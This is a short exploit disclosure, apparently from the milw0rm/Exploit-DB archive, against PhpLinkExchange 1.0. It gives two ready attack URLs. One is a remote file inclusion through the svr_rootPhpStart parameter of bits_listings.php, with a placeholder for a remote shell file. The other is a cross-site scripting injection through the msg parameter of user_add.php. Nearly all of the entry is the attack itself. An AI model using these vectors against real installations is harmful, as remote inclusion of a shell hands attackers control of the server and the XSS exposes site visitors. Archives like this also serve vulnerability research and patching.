PhpLinkExchange 1.0 - Include / Cross-Site Scripting

EDB-ID:

2347


Platform:

PHP

Published:

2006-09-11

vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

# milw0rm.com [2006-09-11]